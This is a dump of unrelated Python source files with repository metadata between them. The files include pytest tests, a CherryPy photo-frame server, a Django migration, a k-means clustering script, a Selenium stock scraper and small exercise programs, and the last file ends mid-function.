with pytest.raises(ValueError, match=msg):
cat.as_unordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.set_categories(["X", "Y", "Z"], rename=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.rename_categories(["X", "Y", "Z"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.reorder_categories(["X", "Y", "Z"], ordered=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.add_categories(new_categories=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.remove_categories(removals=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# issue #37643 inplace kwarg deprecated
cat.remove_unused_categories(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.sort_values(inplace=value)
| [
"ana.kapros@yahoo.ro"
] | ana.kapros@yahoo.ro |
9c42d50f0f0b0b1619ddb3499c1f61feff741ba5 | 5453391441c10fa474a565bbb044b9448e8aeda5 | /tests/invalid_snippets/semicolon.py | 8fa9fe5ceefbb9151fa838e44046eadb163611b7 | [] | permissive | deeplook/pyteen | 9778f3d510c8a6e3052566c5d7994797c20c855e | dc1b2e430d8ce0528544f1cf8dc8c6c1b1acc2ef | refs/heads/master | 2022-12-15T14:33:31.507934 | 2020-07-22T17:19:52 | 2020-09-06T14:11:43 | 281,739,027 | 2 | 0 | MIT | 2020-08-09T21:17:17 | 2020-07-22T17:16:01 | Python | UTF-8 | Python | false | false | 135 | py | # This is invalid because it has semicolon(s).
# The following comment is to make "black" skip any reformating:
# fmt: off
pass; pass
| [
"gherman@darwin.in-berlin.de"
] | gherman@darwin.in-berlin.de |
2b2c376870f94639e8fbc6fbeeed5da072e92f03 | 8ee93a9093150e6b1984e4630c17eaf3d948ee87 | /server.py | e4260daaff217d71edd612fe9cb5ad81e7d90d9c | [] | no_license | bensalkield/Photo-Frame-Controller | 7ecb2be0166919f46ed639a586fc513190083775 | 4c64cea107d64cf0b0a07aa42ce55332795cf4bb | refs/heads/master | 2020-07-15T01:25:25.969482 | 2019-08-30T19:48:25 | 2019-08-30T19:48:25 | 205,447,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,732 | py | import cherrypy
import os.path
import time
import subprocess
from os import listdir
from jinja2 import Template
import sys
def load_template(path):
with open(path, 'r') as f:
return Template(f.read())
def display_photos(path):
photos = [os.path.join(path, f) for f in listdir(path) if os.path.isfile(os.path.join(path, f))]
return subprocess.Popen(['feh','-D','3','-F','--zoom','max'] + photos)
# Terminates the process responsible for displaying photos
def terminate_photos(popen):
popen.terminate()
def test():
pass
class PhotoFrame:
album_photos = None
@cherrypy.expose
def index(self, album=None):
username = "Ben"
output = load_template("./templates/index.html")
if album != None:
album_display = os.path.join(album_path, album)
print(album_display)
if self.album_photos != None:
# Kill the running album
terminate_photos(self.album_photos)
print("test")
self.album_photos = display_photos(album_display)
else:
self.album_photos = display_photos(album_display)
album_list = listdir(album_path)
print(album_list)
return output.render(username=username, album_list=album_list)
if __name__ == '__main__':
if len(sys.argv) == 1:
print("You must supply the album location.")
sys.exit()
else:
album_path = sys.argv[1]
cherrypy.server.socket_host = 'localhost'
configfile = os.path.join(os.path.dirname(__file__),'server.conf')
cherrypy.quickstart(PhotoFrame(),config=configfile)
| [
"benjaminsalkield@benstation.connect"
] | benjaminsalkield@benstation.connect |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py | 4cd1b60079c3d722609128d7ad46956075f117f1 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
| [
"rajagopalx@gmail.com"
] | rajagopalx@gmail.com |
478e33139e3bc44a7eca1b0d21226643e584e4a6 | bf0bf48bf94672c952a204c9a74c1b508a898293 | /tests/test_nnrf.py | 2bd5b17a920ef10b64c3a6650b715263842daea9 | [
"BSD-3-Clause"
] | permissive | paradoxysm/nnrf | dcb9b7e764275841ace606b56f7ba2f260bac226 | 4d83e7c03dffd564d6856ff963c7aa85bb96c73c | refs/heads/master | 2022-08-02T12:32:42.315918 | 2020-05-22T02:16:35 | 2020-05-22T02:16:35 | 262,668,598 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,621 | py | import pytest
import numpy as np
from sklearn.datasets import load_breast_cancer, load_iris
from nnrf import NNRF
dataset = load_breast_cancer()
data = dataset['data']
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
min, max = data.min(axis=0), data.max(axis=0)
data = (data - min) / (max - min)
target = dataset['target']
partition = int(0.8 * len(data))
train_X_bc = data[:partition]
train_Y_bc = target[:partition]
test_X_bc = data[partition:]
test_Y_bc = target[partition:]
dataset = load_iris()
data = dataset['data']
data = (data - np.mean(data, axis=0)) / np.std(data, axis=0)
min, max = data.min(axis=0), data.max(axis=0)
data = (data - min) / (max - min)
target = dataset['target']
partition = int(0.8 * len(data))
train_X_iris = data[:partition]
train_Y_iris = target[:partition]
test_X_iris = data[partition:]
test_Y_iris = target[partition:]
@pytest.mark.parametrize("params", [
({'n':3}),
({'n':3, 'd':3, 'r':'log2'}),
({'n':3, 'loss':'mse'}),
({'n':3, 'optimizer':'sgd'}),
({'n':3, 'regularize':'l2'})
])
class TestNNRF:
def test_nnrf_binary(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_bc, train_Y_bc)
def test_nnrf_multi(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_iris, train_Y_iris)
def test_nnrf_predict_binary(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_bc, train_Y_bc)
nnrf.predict(test_X_bc)
def test_nnrf_predict_multi(self, params):
nnrf = NNRF(**params)
nnrf.fit(train_X_iris, train_Y_iris)
nnrf.predict(test_X_iris)
def test_nnrf_unfit():
nnrf = NNRF()
with pytest.raises(RuntimeError):
nnrf.predict(test_X_bc)
| [
"jeffreyc.wang@mail.utoronto.ca"
] | jeffreyc.wang@mail.utoronto.ca |
7b988acb4a602789c8db156a458b749d69b1e0fa | d7824dc42ac64fcc3c785fed8ff2c7d287945456 | /setup.py | 802d0923ba1d755c679baca4d67114deb6a06777 | [] | no_license | astrosat/dat-utils | 363f262ad366ce18c4db7f666d5d6a58b1880502 | 5bee23c0a3e76b786aaf53e36ad3222a36c6f11c | refs/heads/master | 2023-04-25T21:58:40.016488 | 2021-05-26T12:38:13 | 2021-05-26T12:38:13 | 239,556,126 | 0 | 0 | null | 2021-05-26T12:38:14 | 2020-02-10T16:19:01 | Python | UTF-8 | Python | false | false | 1,214 | py | import os
from setuptools import find_packages, find_namespace_packages, setup
with open(os.path.join(os.path.dirname(__file__), "README.md")) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
# dynamically compute the version, etc....
author = __import__("dat_utils").__author__
title = __import__("dat_utils").__title__
version = __import__("dat_utils").__version__
install_requires = ["pyjwt~=2.1.0"]
setup(
name=title,
version=version,
author=author,
url="https://github.com/astrosat/dat-utils",
description="Data Access Token Utilities",
long_description=README,
long_description_content_type="text/markdown",
install_requires=install_requires,
packages=find_packages(exclude=["example"]),
include_package_data=True,
classifiers=[
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
python_requires=">=3.5",
)
| [
"allyn.treshansky@gmail.com"
] | allyn.treshansky@gmail.com |
881d43562a8e3903e35292bc3823831af8a8f2b3 | 43ef9e99db7596655cc9e726800ddc3efc2ddff1 | /AscendingPattern.py | fdf3b332573855a7ca9acbd809f67f129ae6d5b2 | [] | no_license | sikinder/Python-Projects | 790da09e72428daa2ad2c0280d257eef0da64afc | 58bea1f604f0253aceff18a2bede8f5ff6c759e2 | refs/heads/master | 2021-06-23T17:12:32.228287 | 2021-01-22T15:30:41 | 2021-01-22T15:30:41 | 183,131,442 | 0 | 0 | null | 2019-04-24T02:54:48 | 2019-04-24T02:27:02 | Python | UTF-8 | Python | false | false | 177 | py | lines = int(input("Enter lines for pyramid: "))
space = " "
star = "* "
for i in range(0,lines+1):
print((lines+1)*space, end = '')
print(i*star)
lines = lines - 1
| [
"sikinderbaig@gmail.com"
] | sikinderbaig@gmail.com |
a1c5733dbc7160a32ce830d02b4fdf2f96a3a2fa | cab96d3588f188e22798ddfd43ec153b7f472a2a | /code/wkmeans/main.py | 86e17afd3535d0f8bce899aaabffcb5818c398a5 | [] | no_license | aligator4sah/TAME | 79308b41ffa5a9e5ae5df5376942a769612a591b | a1fe28d997fb463d5ad9c85b7aee7cebbbb89f29 | refs/heads/master | 2023-08-19T06:21:50.738544 | 2020-12-17T01:33:01 | 2020-12-17T01:33:01 | 680,073,183 | 0 | 0 | null | 2023-08-18T09:22:10 | 2023-08-18T09:22:05 | null | UTF-8 | Python | false | false | 2,324 | py | # coding=utf8
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import os
import sys
sys.path.append('../tools')
sys.path.append('../imputation')
import copy
import time
import numpy as np
from sklearn import metrics
from sklearn.cluster import spectral_clustering
import random
import json
from glob import glob
from collections import OrderedDict
from tqdm import tqdm
from multiprocessing import Process, Pool
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import parse, py_op
args = parse.args
inf = 100000000.0
def compute_weight(dist_mat, groups):
    """Return, for each group, a normalized weight per member.

    For a group the intra-group distance sub-matrix is averaged per member,
    pushed through a logistic 1 / (1 + e^d) — so members closer to the rest
    of the group get larger weight — and normalized to sum to one.
    """
    def _member_weights(members):
        # Mean distance of every member to the rest of its own group.
        avg_dist = dist_mat[members][:, members].mean(0)
        raw = 1.0 / (1.0 + np.exp(avg_dist))
        return raw / raw.sum()

    return [_member_weights(g) for g in groups]
def wkmeans_epoch(dist_mat, groups):
    """Run one weighted-k-means assignment step and return the new groups.

    Each cluster is summarized as the weighted average of its members'
    distance rows; every sample is then re-assigned to the cluster with the
    smallest such distance (ties go to the lowest cluster index, exactly as
    list.index(min(...)) resolves them).
    """
    assert dist_mat.min() >= 0  # distances must be non-negative
    weights = compute_weight(dist_mat, groups)

    # Weighted mean distance from each cluster to every sample.
    centroid_dist = [np.dot(w, dist_mat[g]) for g, w in zip(groups, weights)]

    reassigned = [[] for _ in groups]
    for sample in range(len(dist_mat)):
        per_cluster = [d[sample] for d in centroid_dist]
        best = per_cluster.index(min(per_cluster))
        reassigned[best].append(sample)
    return reassigned
def wkmeans(n_cluster):
    """Weighted k-means over a precomputed admission distance matrix.

    Loads the admission-id list and pairwise distance matrix produced by an
    earlier pipeline step, runs 100 assignment epochs, and every 10th epoch
    persists the cluster membership (as admission ids) to
    cluster_results.json in the subtyping directory.
    """
    subtyping_dir = os.path.join(args.result_dir, args.dataset, 'subtyping')
    hadm_id_list = py_op.myreadjson(os.path.join(subtyping_dir, 'hadm_id_list.json'))
    hadm_dist_matrix = np.load(os.path.join(subtyping_dir, 'hadm_dist_matrix.npy'))
    # Row i of the matrix must correspond to hadm_id_list[i].
    assert len(hadm_dist_matrix) == len(hadm_id_list)
    # initialization
    # NOTE(review): np.random.shuffle(range(...)) only works on Python 2,
    # where range returns a list; the reload(sys) idiom at the top of this
    # file suggests Python 2 is indeed the target — confirm before porting.
    indices = range(len(hadm_id_list))
    np.random.shuffle(indices)
    # Seed each of the n_cluster groups with 10 random samples.
    init_groups = [indices[i*10: i*10 + 10] for i in range(n_cluster)]
    groups = init_groups
    for epoch in range(100):
        groups = wkmeans_epoch(hadm_dist_matrix, groups)
        print([len(g) for g in groups])  # progress: cluster sizes per epoch
        # Every 10th epoch (after the first), persist the current clusters.
        if epoch and epoch % 10 == 0:
            cluster_results = []
            for g in groups:
                cluster_results.append([hadm_id_list[i] for i in g])
            py_op.mywritejson(os.path.join(subtyping_dir, 'cluster_results.json'), cluster_results)
py_op.mywritejson(os.path.join(subtyping_dir, 'cluster_results.json'), cluster_results)
def main():
    # Cluster count comes from the command-line argument parsed in parse.py.
    wkmeans(args.nc)
if __name__ == '__main__':
    main()
| [
"1094990538@qq.com"
] | 1094990538@qq.com |
3b09f9cd2a8533357819a76a96b46897eb6cbcd3 | 7939b7ab91519d1f88656847174207a76ee4c1d5 | /Python Programs Fall 2018 /Assignments/M6-A6/testBankAccount.py | f79baa223e305a4df9c3adcee3746f0720a85d31 | [] | no_license | eliefrancois/Python | 832d8f9a66a9f7d93d6bf153ac71cad9f1c6691f | f5ac08caaeecdb1d4f347451be33a8314ebc9d06 | refs/heads/master | 2020-08-08T05:03:14.486647 | 2019-10-08T18:48:24 | 2019-10-08T18:48:24 | 213,724,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | import bankAccount
import datetime
myObject = bankAccount.bankAccount(123456,10000,2.5,datetime.datetime.today())
myObject.withdraw(3500)
myObject.deposit(500)
print(myObject.getBalance())
print(myObject.getMonthlyInterest())
print(myObject.getDateCreated().strftime("%a %b %d %H:%M:%S %Z %Y"))
| [
"noreply@github.com"
] | eliefrancois.noreply@github.com |
e6189bce06455473f3b957791389e8dc1850167b | 197c7d084aec186c0335637b005a4dc99bb18e3a | /initial/singly_linked_list/singly_linked_list.py | 957ae5688219659f6c0a908b10944c21bfddffec | [] | no_license | Aszalea-Calderon/cs-py-data-structures | 521bda53c6bf2af11104093de0c3f3b3d41b43e2 | abbe10c85d85d078bc316019434f39da00dbcf85 | refs/heads/main | 2023-03-05T06:40:14.302740 | 2021-02-08T18:55:59 | 2021-02-08T18:55:59 | 337,243,989 | 0 | 0 | null | 2021-02-09T00:01:36 | 2021-02-09T00:01:35 | null | UTF-8 | Python | false | false | 2,109 | py | class Node:
"""
A class representation of a DoublyLinkedList Node.
Each Node will store
(1) a value (could be of any type) and
(2) a reference to the next_node Node in list.
"""
def __init__(self, value):
self.value = value
self.next = None
def __repr__(self):
return f"Node({self.value}"
class LinkedList:
    """
    A class representation of a Singly-Linked-List.

    Stores a reference to
    (1) the head (first node in list) and
    (2) the tail (last node in list).

    Each item in the list is an instance of class Node (defined above); each
    node stores a value and a reference to the next Node in the list.
    """
    def __init__(self):
        """
        Constructs a new, empty LinkedList.
        """
        self.head = None
        self.tail = None

    def add_to_head(self, value):
        """
        Adds a Node with the given value to the beginning of the list.

        :param value: the value to store at the beginning of the list
        :return: None
        """
        # Wrap the given value in a Node and make it the new head.
        node = Node(value)
        node.next = self.head
        self.head = node
        if self.tail is None:  # list was empty: the new node is also the tail
            self.tail = node

    def add_to_tail(self, value):
        """
        Adds a Node with the given value to the end of the list.

        :param value: the value to store at the end of the list
        :return: None
        """
        node = Node(value)
        if self.tail is None:  # empty list: node becomes both head and tail
            self.head = node
        else:
            self.tail.next = node
        self.tail = node

    def remove_head(self):
        """
        Remove the item at the beginning of the list.

        :return: The value of the item being removed (None if the list is empty)
        """
        if self.head is None:
            return None
        removed = self.head
        self.head = removed.next
        if self.head is None:  # list became empty
            self.tail = None
        return removed.value

    def remove_tail(self):
        """
        Remove the item at the end of the list.

        O(n): a singly-linked list must walk from the head to find the node
        preceding the tail.

        :return: The value of the item being removed (None if the list is empty)
        """
        if self.head is None:
            return None
        if self.head is self.tail:  # single-element list
            value = self.head.value
            self.head = None
            self.tail = None
            return value
        prev = self.head
        while prev.next is not self.tail:
            prev = prev.next
        value = self.tail.value
        prev.next = None
        self.tail = prev
        return value
"chaz-kiker@lambdastudents.com"
] | chaz-kiker@lambdastudents.com |
c88ac0275bde4912997ca35567020060cd5e0c47 | a8b678342127aff21759b5b877d00c94234f7f7e | /Module.py | 26ca99ebb7222221b8e5dd36078f0c74b8040016 | [] | no_license | sonkute96/hocPython | 099c6909b64f8f49e19ec7586d95ef3588bcd2e5 | bba1e90dbe8fd12ed4632a06f3c3815ea12d0988 | refs/heads/master | 2021-01-25T00:55:55.369391 | 2017-06-18T15:48:15 | 2017-06-18T15:48:15 | 94,696,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py | class Song(object):
def __init__(self, lyrics):
self.lyrics = lyrics
def sing_me_a_song(self):
for line in self.lyrics:
print line
happy_bday = Song(["happy birthday","hello son"])
happy_bday.sing_me_a_song()
| [
"phamson@Phams-MacBook-Pro.local"
] | phamson@Phams-MacBook-Pro.local |
8b1336a8a8e9dcca112c2c475884faf365aae111 | 852dae69fda38885bc87efa3f30fc5244ba10896 | /Documents/pythoncode/webscrapping_prax.py | 8acfddb24dbbff7b7ce535d73f965d00763e3895 | [] | no_license | brandon-todd/alien_invasion_game | 5c9bb6d5fd2e570ee1e01e16854d2aad6c8cce10 | c1c2ade8ad17fd37e5d4193251e313cca16903bc | refs/heads/master | 2023-03-15T01:51:02.941347 | 2021-03-18T20:11:54 | 2021-03-18T20:11:54 | 337,286,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import json
import selenium
from selenium import webdriver
import time
import io
import schedule
import time
stock_history = {}
def stocks_check(t):
    """Scrape Yahoo Finance's 'most active' table and record stock changes.

    Appends each company's current 'Change' value to the module-level
    stock_history dict and persists the whole history to data.txt as JSON.

    :param t: unused message string supplied by the scheduler
    :return: the string "done"
    """
    print("I'm working...")
    PATH = 'C:\Program Files (x86)\chromedriver.exe'
    driver = webdriver.Chrome(PATH)
    url = 'https://finance.yahoo.com/most-active'
    driver.get(url.format(q='Car'))
    try:
        # Wait (up to 10s each) until both columns are present in the DOM.
        WebDriverWait(driver, 10).until(
            EC.presence_of_element_located((By.CSS_SELECTOR, "[aria-label='Change']"))
        )
        WebDriverWait(driver, 10).until(
            EC.presence_of_element_located((By.CSS_SELECTOR, "[aria-label='Name']"))
        )
        companies = driver.find_elements_by_css_selector("[aria-label='Name']")
        changes = driver.find_elements_by_css_selector("[aria-label='Change']")
        names = [el.text for el in companies]
        deltas = [el.text for el in changes]
    except Exception:
        # Bug fix: the original fell through after the except with lst1/lst2
        # undefined, raising NameError below. Bail out instead.
        return "done"
    finally:
        # Bug fix: the original only quit the driver on failure, leaking a
        # browser process on every successful run.
        driver.quit()
    for name, delta in zip(names, deltas):
        # Start a history list for new tickers; append for known ones.
        stock_history.setdefault(name, []).append(delta)
    print(stock_history)
    # Bug fix: mode 'a' appended a complete JSON document on every call,
    # leaving data.txt unparseable after the first run; 'w' rewrites the
    # accumulated history as one valid JSON object.
    with open('data.txt', 'w') as outfile:
        json.dump(stock_history, outfile)
    return "done"
# Run the scraper once per day at 08:58 (local time); the string argument is
# passed through to stocks_check's unused `t` parameter.
schedule.every().day.at("08:58").do(stocks_check,'It is 08:58')
while True:
    # Poll the scheduler twice a minute; run_pending fires any due jobs.
    schedule.run_pending()
    time.sleep(30)
| [
"brandon-todd@users.noreply.github.com"
] | brandon-todd@users.noreply.github.com |
05edffa7e780d484e73b82f8ab0728af5e752681 | abbe7809ab9c3915b40e67f87dd5ff109a0bfa75 | /Curso em vídeo/Ex 009 - tabuada.py | e886040a4baf5a03dd2a58127b02140cce9c21f9 | [
"MIT"
] | permissive | Ianashh/Python-Testes | 0c3428a6195d9fbaff6c03a244faf0bbb35f6004 | 83d9e2775833272279b52320f141d759ec952858 | refs/heads/main | 2023-07-22T10:38:22.662317 | 2021-09-02T06:41:50 | 2021-09-02T06:41:50 | 381,902,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | n = int(input('Digite um numero para ver sua tabuada: '))
# ANSI escape sequences for terminal colours ('limpa' resets all formatting).
cores = {'limpa':'\033[m',
         'vermelho':'\033[31m',
         'verde':'\033[32m',
         'amarelo':'\033[33m',
         'azul':'\033[34m',
         'lilas':'\033[35m',
         'ciano':'\033[36m'}
# ANSI escape sequences for text styling (bold / underline).
formatação = {'negrito':'\033[1m',
              'sublinhado':'\033[4m'}
print('_' *15)
# Multiplication table of `n` (read from input above), rendered underlined
# and green, one product per line from n*1 through n*10, then reset.
print('{}{}{} x 01 = {} \n{} x 02 = {} \n{} x 03 = {} \n{} x 04 = {} \n{} x 05 = {} \n{} x 06 = {} \n{} x 07 = {} \n{} x 08 = {} \n{} x 09 = {} \n{} x 10 = {}{}'
      .format(formatação['sublinhado'],cores['verde'],n, n*1,n, n*2,n, n*3,n, n*4,n, n*5,n, n*6,n, n*7,n, n*8,n, n*9,n, n*10,cores['limpa']))
print('_' *15)
"82633785+Ianashh@users.noreply.github.com"
] | 82633785+Ianashh@users.noreply.github.com |
3ca35f3537a824472f63b7833626c34abcf1e3e6 | befafdde28c285c049b924fa58ce6240a4ae8d3c | /python_solution/Backtracking/40_CombinationSumII.py | 3c2f5d5b703d0d38f2bbe30c891c104f20adad1e | [] | no_license | Dimen61/leetcode | 3364369bda2255b993581c71e2b0b84928e817cc | 052bd7915257679877dbe55b60ed1abb7528eaa2 | refs/heads/master | 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
return result | [
"dimen61@gmail.com"
] | dimen61@gmail.com |
ab2af8fd45aea04162d59882a3ea970e181727bc | 7bcb08ac43dc6eaca141a0259c33d057d3ec8fd4 | /app.py | 7f7abde535203b00bc2bc0af799b1197ab241215 | [
"MIT"
] | permissive | Salvador1994/Sistema_Bottle | 133a585fd69a8797eb92ec98d978b6d7d15f5f4b | 4ff8a39e7e7f5cf678070cf00e38b05ad2ced654 | refs/heads/master | 2020-04-03T10:32:57.655145 | 2018-10-29T11:13:39 | 2018-10-29T11:13:39 | 155,196,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | from bottle import route, run
from bottle import request, template
from bottle import static_file, get
from bottle import error
import os
# static routes
# Serve static assets by file extension: each handler maps a regex URL
# pattern to the matching subdirectory of static/ via bottle's static_file.
@get('/<filename:re:.*\.css>')
def stylesheets(filename):
    return static_file(filename, root='static/css')
@get('/<filename:re:.*\.js>')
def javascripts(filename):
    return static_file(filename, root='static/js')
@get('/<filename:re:.*\.(jpg|png|gif|ico)>')
def images(filename):
    return static_file(filename, root='static/img')
@get('/<filename:re:.*\.(eot|ttf|woff|svg)>')
def fonts(filename):
    return static_file(filename, root='static/fonts')
# GET /login: render the login form.
@route('/login') # @get('/login')
def login():
    return template('login')
def check_login(username, password):
    """Return True when *username* is a known user and *password* matches.

    Credentials are hard-coded in memory (demo/toy app only).
    """
    known_users = {'marcos': 'python', 'Salvador Bila': 'java'}
    stored = known_users.get(username)
    return stored is not None and stored == password
# NOTE(review): two functions share the name `index`. The second def rebinds
# the module attribute, but bottle captured each function object at
# decoration time, so both '/' and '/index' still serve template('index').
# Consider stacking both @route decorators on a single function.
@route('/')
def index():
    return template('index')
@route('/index')
def index():
    return template('index')
@route('/login', method='POST') # @post('/login')
def acao_login():
    """Handle the login form POST and render the matching page."""
    username = request.forms.get('username')
    password = request.forms.get('password')
    # check_login is deterministic, so calling it once is equivalent to the
    # original's three identical calls.
    authenticated = check_login(username, password)
    page = 'Area_Administrativa' if authenticated else 'verificacao_login'
    return template(page, sucesso=authenticated, nome=username)
# Custom 404 handler: render a friendly not-found page.
@error(404)
def error404(error):
    return template('pagina404')
if __name__ == '__main__':
    # On Heroku bind to the platform-assigned port; locally run a dev server
    # with debug output and auto-reload on file changes.
    if os.environ.get('APP_LOCATION') == 'heroku':
        run(host='0.0.0.0',port=int(os.environ.get('PORT', 5000)))
    else:
        run(host='localhost', port=8080, debug=True, reloader=True)
"noreply@github.com"
] | Salvador1994.noreply@github.com |
2cfaa7079668d65dafd05f8f281097e1876581ab | 9a7f865d0128319183cb43b05fbbb76d2366a1c9 | /sluggen/migrations/0001_initial.py | e0cc4cf0130f8e914ced082f1a2dec4c107784fe | [
"MIT"
] | permissive | colonoh/longcat | 5bed18237c78e76222126e90ae16706b4dec9070 | d5d6044517b36a1e48ba79836ddb43793da0f91b | refs/heads/master | 2021-10-08T05:50:49.844173 | 2020-04-24T05:58:09 | 2020-04-24T05:58:09 | 253,127,249 | 0 | 0 | MIT | 2021-09-22T18:50:13 | 2020-04-05T00:43:12 | Python | UTF-8 | Python | false | false | 829 | py | # Generated by Django 3.0.5 on 2020-04-12 01:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (see header). Once applied
    # anywhere, the recorded operations must stay stable — prefer a new
    # migration over editing this one.

    initial = True

    dependencies = [
    ]

    operations = [
        # Creates the Slug table: a short slug mapping back to a full URL,
        # with a creation timestamp and a visit counter.
        migrations.CreateModel(
            name='Slug',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='date created')),
                ('url', models.URLField(verbose_name='original version of the URL')),
                ('slug', models.SlugField(max_length=7, verbose_name='shortened version of the URL')),
                ('hits', models.PositiveIntegerField(default=0, verbose_name='number of visitors to this slug')),
            ],
        ),
    ]
| [
"steve.j.warner@gmail.com"
] | steve.j.warner@gmail.com |
68ea54b45f3ec24b7664171fa63a5404d46fb985 | e7143b374352cf06d2ac020bff7072563e7f99e1 | /rr.py | ceddb020257b4f88e59d7b21cdcdc593e6751623 | [] | no_license | zhouguangying1/test | 3373bc2c8537ec6af56028ce3aa3230c54b1e319 | b76004b5de0e835a269278db715536f54252dee4 | refs/heads/master | 2022-12-30T01:10:57.615909 | 2020-10-18T09:56:29 | 2020-10-18T09:56:29 | 305,017,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21 | py | print('test4444444')
| [
"394973674@qq.com"
] | 394973674@qq.com |
6ca24cbab5b079882c41eb88ffe91a506f7f9f9b | 4e3231ea01eeb45d2e357841a1874c68bce5fdb9 | /number_guess.py | c265efeff97eaa938a2eddec1f1b6050bd3e8f1d | [] | no_license | J4Jeffort/Jeffort | 85fbad0f583a3e9be767777a2b6feae9415174e4 | 027bcff69a2ea78434184fc2f07951e649c803b4 | refs/heads/main | 2023-03-13T19:48:04.543359 | 2021-03-06T05:45:38 | 2021-03-06T05:45:38 | 324,704,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from random import randint
from number_guess_art import logo
easy = 10
hard = 5
#Function to check user's guess against actual answer.
def check_answer(guess, answer, turns):
    """Compare *guess* with *answer*, print feedback, and return the number
    of turns remaining.

    Returns None on a correct guess (matching the original's implicit
    return), which the caller relies on to end the round.
    """
    if guess == answer:
        print(f"You got it! The answer was {answer}.")
        return None
    print("Too high..." if guess > answer else "Too low...")
    return turns - 1
#Make function to set difficulty.
def set_difficulty():
    """Ask the player for a difficulty and return the matching turn count.

    Any answer other than the literal string 'easy' selects hard mode,
    exactly as the original behaved.
    """
    choice = input("Choose a difficulty. Type 'easy' or 'hard': ")
